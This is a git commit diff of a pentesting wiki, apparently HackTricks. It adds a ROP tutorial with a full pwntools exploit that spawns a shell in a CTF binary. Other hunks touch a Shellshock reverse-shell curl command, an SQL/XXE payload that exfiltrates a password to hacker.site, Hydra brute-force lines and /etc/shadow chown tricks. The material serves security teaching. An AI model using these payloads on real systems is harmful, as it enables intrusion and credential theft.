GitBook: [master] 19 pages and 4 assets modified

This commit is contained in:
CPol 2021-09-25 16:33:43 +00:00 committed by gitbook-bot
parent c59e78e9c2
commit 9d85603d35
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
21 changed files with 219 additions and 78 deletions

View file

Before

Width:  |  Height:  |  Size: 740 KiB

After

Width:  |  Height:  |  Size: 740 KiB

View file

Before

Width:  |  Height:  |  Size: 740 KiB

After

Width:  |  Height:  |  Size: 740 KiB

View file

@ -514,7 +514,7 @@
* [Linux Exploiting \(Basic\) \(SPA\)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format String Template](exploiting/linux-exploiting-basic-esp/format-string-template.md)
* [ROP - Syscall execv](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address.md)
* [ROP-PWN template](exploiting/linux-exploiting-basic-esp/rop-pwn-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)

View file

@ -27,12 +27,6 @@ Heap**
**Stack**
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
**Sección BSS**: Variables globales o estáticas sin inicializar
```text
@ -51,19 +45,27 @@ int i = 5;
**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\)
## **1.STACK OVERFLOWS**
> buffer overflow, buffer overrun, stack overrun, stack smashing
Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso.
\*\*\*\*
Para obtener la dirección de una función dentro de un programa se puede hacer:
```text
objdump -d ./PROGRAMA | grep FUNCION
```
Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=path` donde path es la ruta absoluta al programa
* explotar el programa usando la ruta absoluta
* asegúrate de que PWD y OLDPWD son las mismas que en gdb
## ROP
### Call to sys\_execve
{% page-ref page="rop-syscall-execv.md" %}
## **2.SHELLCODE**

View file

@ -1,51 +1,164 @@
# ROP - Syscall execv
# ROP - call sys\_execve
The objective is to call the **syscall \(execv\)** from a ROP controlling the value of registries: _RDI, RSI, RDX, RAX_ and obviously the _RIP_ \(the other ones doesn't matters\), and controlling somewhere to write _"/bin/sh"_
In order to prepare the call for the **syscall** it's needed the following configuration:
* **RDI**: Pointing to the string "/bin/bash"
* **RSI**: Null
* **RDX**: Null
* **RAX**: Value **0x3b** for x64 and **0xb** for x32, because this will call **execv**
* `rax: 59 Specify sys_execve`
* `rdi: ptr to "/bin/sh" specify file to execute`
* `rsi: 0 specify no arguments passed`
* `rdx: 0 specify no environment variables passed`
So, basically it's needed to write the string `/bin/sh` somewhere and then perform the `syscall` \(being aware of the padding needed to control the stack\).
## Control the registers
Let's start by finding **how to control those registers**:
```c
ROPgadget --binary speedrun-001 | grep -E "pop (rdi|rsi|rdx\rax) ; ret"
0x0000000000415664 : pop rax ; ret
0x0000000000400686 : pop rdi ; ret
0x00000000004101f3 : pop rsi ; ret
0x00000000004498b5 : pop rdx ; ret
```
With these addresses it's possible to **write the content in the stack and load it into the registers**.
## Write string
### Writable memory
Frist you need to find a writable place in the memory
```bash
ROPgadget --binary vulnbinary | grep syscall
ROPgadget --binary vulnbinary | grep "rdi\|rsi\|rdx\|rax" | grep pop
gef> vmmap
[ Legend: Code | Heap | Stack ]
Start End Offset Perm Path
0x0000000000400000 0x00000000004b6000 0x0000000000000000 r-x /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006b6000 0x00000000006bc000 0x00000000000b6000 rw- /home/kali/git/nightmare/modules/07-bof_static/dcquals19_speedrun1/speedrun-001
0x00000000006bc000 0x00000000006e0000 0x0000000000000000 rw- [heap]
```
## Writing
### Write String
If you can somehow write to an address and then get the address of where you have written then this step is unnecessary.
Then you need to find a way to write arbitrary content in this address
Elsewhere, you may search for some **write-what-where**.
As is explained in this tutorial: [https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/](https://failingsilently.wordpress.com/2017/12/14/rop-chain-shell/) you have to find something that allows you to save some value inside a registry and then save it to some controlled address inside another registry. For example some `pop eax; ret` , `pop edx: ret` , `mov eax, [edx]`
You can find mov gadgets doing: `ROPgadget --binary vulnbinary | grep mov`
### Finding a place to write
If you have found some **write-what-where** and can control the needed registries to call execv, there is only left finding a place to write.
```bash
objdump -x vulnbinary | grep ".bss" -B1
CONTENTS, ALLOC, LOAD, DATA
23 .bss 00000010 00403418 00403418 00002418 2**3
```python
ROPgadget --binary speedrun-001 | grep " : mov qword ptr \["
mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
```
In this case: **0x403418**
#### 32 bits
### **Writing** _**"/bin/sh"**_
```python
'''
Lets write "/bin/sh" to 0x6b6000
```text
buffer += address(pop_eax) # place value into EAX
buffer += "/bin" # 4 bytes at a time
buffer += address(pop_edx) # place value into edx
buffer += address(writable_memory)
buffer += address(writewhatwhere)
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
buffer += address(pop_eax)
buffer += "//sh"
buffer += address(pop_edx)
buffer += address(writable_memory + 4)
buffer += address(writewhatwhere)
rop += popRdx # place value into EAX
rop += "/bin" # 4 bytes at a time
rop += popRax # place value into edx
rop += p32(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
rop += popRdx
rop += "//sh"
rop += popRax
rop += p32(0x6b6000 + 4)
rop += writeGadget
```
#### 64 bits
```python
'''
Lets write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000) # Writable memory
rop += writeGadget #Address to: mov qword ptr [rax], rdx
```
## Example
```python
from pwn import *
target = process('./speedrun-001')
#gdb.attach(target, gdbscript = 'b *0x400bad')
# Establish our ROP Gadgets
popRax = p64(0x415664)
popRdi = p64(0x400686)
popRsi = p64(0x4101f3)
popRdx = p64(0x4498b5)
# 0x000000000048d251 : mov qword ptr [rax], rdx ; ret
writeGadget = p64(0x48d251)
# Our syscall gadget
syscall = p64(0x40129c)
'''
Here is the assembly equivalent for these blocks
write "/bin/sh" to 0x6b6000
pop rdx, 0x2f62696e2f736800
pop rax, 0x6b6000
mov qword ptr [rax], rdx
'''
rop = ''
rop += popRdx
rop += "/bin/sh\x00" # The string "/bin/sh" in hex with a null byte at the end
rop += popRax
rop += p64(0x6b6000)
rop += writeGadget
'''
Prep the four registers with their arguments, and make the syscall
pop rax, 0x3b
pop rdi, 0x6b6000
pop rsi, 0x0
pop rdx, 0x0
syscall
'''
rop += popRax
rop += p64(0x3b)
rop += popRdi
rop += p64(0x6b6000)
rop += popRsi
rop += p64(0)
rop += popRdx
rop += p64(0)
rop += syscall
# Add the padding to the saved return address
payload = "0"*0x408 + rop
# Send the payload, drop to an interactive shell to use our new shell
target.sendline(payload)
target.interactive()
```
## References
* [https://guyinatuxedo.github.io/07-bof\_static/dcquals19\_speedrun1/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals19_speedrun1/index.html)

View file

@ -24,7 +24,7 @@ msfvenom /p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> [EXITFUNC=thread]
apt-get install gdb
```
### Parameters:
### Parameters
**-q** --&gt; No show banner
**-x &lt;file&gt;** --&gt; Auto-execute GDB instructions from here
@ -91,6 +91,32 @@ pattern search "avaaawaa" #Search for the offset of that substring
pattern search $rsp #Search the offset given the content of $rsp
```
### Tricks
#### GDB same addresses
While debugging GDB will have **slightly different addresses than the used by the binary when executed.** You can make GDB have the same addresses by doing:
* `unset env LINES`
* `unset env COLUMNS`
* `set env _=<path>` _Put the absolute path to the binary_
* Exploit the binary using the same absolute route
* `PWD` and `OLDPWD` must be the same when using GDB and when exploiting the binary
#### Backtrace to find functions called
When you have a **statically linked binary** all the functions will belong to the binary \(and no to external libraries\). In this case it will be difficult to **identify the flow that the binary follows to for example ask for user input**.
You can easily identify this flow by **running** the binary with **gdb** until you are asked for input. Then, stop it with **CTRL+C** and use the **`bt`** \(**backtrace**\) command to see the functions called:
```text
gef➤ bt
#0 0x00000000004498ae in ?? ()
#1 0x0000000000400b90 in ?? ()
#2 0x0000000000400c1d in ?? ()
#3 0x00000000004011a9 in ?? ()
#4 0x0000000000400a5a in ?? ()
```
### GDB server
`gdbserver --multi 0.0.0.0:23947` \(in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine\)

View file

@ -744,7 +744,7 @@ And in order to read a file you could do:
print(open("/etc/shadow", "r").read())
```
#### Example with _\*\*_Environment \(Docker breakout\)
#### Example with \_\*\*\_Environment \(Docker breakout\)
You can check the enabled capabilities inside the docker container using:
@ -1124,6 +1124,7 @@ python -c 'import os;os.chown("/etc/shadow",1000,1000)'
```
Or with the **`ruby`** binary having this capability:
```bash
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
```

View file

@ -128,7 +128,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
![](../../../.gitbook/assets/image%20%28567%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
### Step 6: Profile Installation

View file

@ -5,7 +5,7 @@
This technique can be use to extract information from a user when an **HTML injection is found**. This is very useful if you **don't find any way to exploit a** [**XSS** ](xss-cross-site-scripting/)but you can **inject some HTML tags**.
It is also useful if some **secret is saved in clear text** in the HTML and you want to **exfiltrate** it from the client, or if you want to mislead some script execution.
Several techniques commented here can be used to bypass some ****[**Content Security Policy**](content-security-policy-csp-bypass.md) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
Several techniques commented here can be used to bypass some **\*\*\[**Content Security Policy\*\*\]\(content-security-policy-csp-bypass.md\) by exfiltrating information in unexpected ways \(html tags, CSS, http-meta tags, forms, base...\).
## Main Applications
@ -207,8 +207,7 @@ This can be mitigated with something like: _**sandbox= allow-scripts allow-to
### &lt;meta abuse
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
You could use **`meta http-equiv`** to perform **several actions** like setting a Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` or performing a redirect \(in 5s in this case\): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
This can be **avoided** with a **CSP** regarding **http-equiv** \( `Content-Security-Policy: default-src 'self';`, or `Content-Security-Policy: http-equiv 'self';`\)
@ -227,21 +226,19 @@ Not all the ways to leak connectivity in HTML will be useful for Dangling Markup
## Brute-Force Detection List
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/dangling\_markup.txt" caption="" %}
## References
All the techniques presented here and more can view reviewed with more details in:
{% embed url="http://lcamtuf.coredump.cx/postxss/" %}
{% embed url="http://lcamtuf.coredump.cx/postxss/" caption="" %}
Another HTML tags that can be abused can be find here:
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" %}
{% embed url="http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/" caption="" %}
More info:
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" %}
{% embed url="https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup" caption="" %}

View file

@ -29,7 +29,7 @@ wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../
**Mixing several \*nix LFI lists and adding more paths I have created this one:**
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_linux.txt" caption="" %}
Try also to change `/` for `\`
Try also to add `../../../../../`
@ -40,7 +40,7 @@ A list that uses several techniques to find the file /etc/password \(to check if
Merging several lists I have created:
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" %}
{% embed url="https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/file\_inclusion\_windows.txt" caption="" %}
Try also to change `/` for `\`
Try also to remove `C:/` and add `../../../../../`
@ -53,7 +53,7 @@ Check the LFI list of linux.
## Basic LFI and bypasses
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt\)\).
All the examples are for Local File Inclusion but could be applied to Remote File Inclusion also \(page=[http://myserver.com/phpshellcode.txt\](http://myserver.com/phpshellcode.txt%29\).
```text
http://example.com/index.php?page=../../../etc/passwd
@ -330,7 +330,7 @@ Other possible log paths:
/var/log/httpd/error_log
```
Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
Fuzzing wordlist: [https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI)
### Via Email

View file

@ -248,6 +248,7 @@ select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```
### Out of band data exfiltration via XXE
```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
```

View file

@ -265,7 +265,7 @@ Entry_1:
print(s.run_ps('ipconfig'))
https://book.hacktricks.xyz/pentesting/pentesting-winrm
Entry_2:
Name: Hydra Brute Force
Desctiption: Need User

View file

@ -225,7 +225,7 @@ Entry_5:
Name: Browser Connection
Description: Connect with Browser
Note: ftp://anonymous:anonymous@{IP}
Entry_6:
Name: Hydra Brute Force
Description: Need Username

View file

@ -374,10 +374,10 @@ Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -h {IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
```

View file

@ -111,7 +111,7 @@ Entry_4:
Name: Nmap
Description: Scan for POP info
Command: nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -p 110 {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need User

View file

@ -499,7 +499,7 @@ Entry_4:
Name: Nmap Smb Scan 2
Description: SMB Vuln Scan With Nmap (Less Specific)
Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}
Entry_5:
Name: Hydra Brute Force
Desctiption: Need User

View file

@ -74,7 +74,7 @@ Or **automate** this with **nmap** plugin `smtp-ntlm-info.nse`
Some SMTP servers auto-complete a sender's address when command "MAIL FROM" is issued without a full address, disclosing its internal name:
```
```text
220 somedomain.com Microsoft ESMTP MAIL Service, Version: Y.Y.Y.Y ready at Wed, 15 Sep 2021 12:13:28 +0200
EHLO all
250-somedomain.com Hello [x.x.x.x]
@ -507,7 +507,7 @@ Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}
Entry_7:
Name: Hydra Brute Force
Description: Need Nothing

View file

@ -210,7 +210,7 @@ Entry_4:
Name: Nmap
Description: Nmap snmp (no brute)
Command: nmap --script "snmp* and not snmp-brute" {IP}
Entry_5:
Name: Hydra Brute Force
Description: Need Nothing

View file

@ -287,3 +287,4 @@ Entry_1:
Description: Need Username
Command: hydra -v -V -u -l {Username} -P {Big_Passwordlist} -t 1 -u {IP} ssh
```

View file

@ -373,7 +373,7 @@ Entry_10:
Command: |
?What is the location of the wp-login.php? Example: /Yeet/cannon/wp-login.php
wpscan --url {Web_Proto}://{IP}{1} --enumerate ap,at,cb,dbe && wpscan --url {Web_Proto}://{IP}{1} --enumerate u,tt,t,vp --passwords {Big_Passwordlist} -e
Entry_11:
Name: WordPress Hydra Brute Force
Description: Need User (admin is default)

View file

@ -13,7 +13,7 @@ Exploiting this vulnerability the **page could throw an error**.
You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** \(with cgi folder\) or using **nikto**.
#### **Test**
### **Test**
Most tests are based in echo something and expect that that string is returned in the web response. If you think a page may be vulnerable, search for all the cgi pages and test them.
@ -23,7 +23,7 @@ Most tests are based in echo something and expect that that string is returned i
nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
```
#### **Curl \(reflected, blind and out-of-band\)**
### **Curl \(reflected, blind and out-of-band\)**
```bash
# Reflected
@ -40,7 +40,7 @@ curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http:
python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi
```
#### Exploit
### Exploit
```bash
#Bind Shell